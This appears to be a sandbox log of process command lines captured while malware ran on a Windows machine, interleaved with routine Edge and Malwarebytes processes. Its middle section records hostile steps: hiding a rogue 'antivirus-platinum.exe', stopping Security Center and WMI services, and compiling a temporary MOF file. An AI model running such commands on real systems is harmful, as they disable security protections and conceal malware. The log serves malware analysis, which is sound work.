"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5156 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5832 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:2

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F8F.tmp\302746537.bat" "

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop winmgmt /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start winmgmt

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4a0

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\1104608860c54545a989b33024c7052f /t 5196 /p 5068

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe

"C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\Users\Admin\AppData\LocalLow\IGDump\lnxhcbwaryuevxbbpekxrxklkrkslvbc\ig.exe

ig.exe timer 4000 jjmirfabmnuewfowhvyksarxoxszljjv.ext

C:\Users\Admin\AppData\LocalLow\IGDump\davouwkqqovaochrqulzzbfmowcvilmz\ig.exe

ig.exe timer 4000 bwrgjvjfzvucdzfuvwdtsoltnbbfqbpd.ext

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe

ig.exe reseed

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2676 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

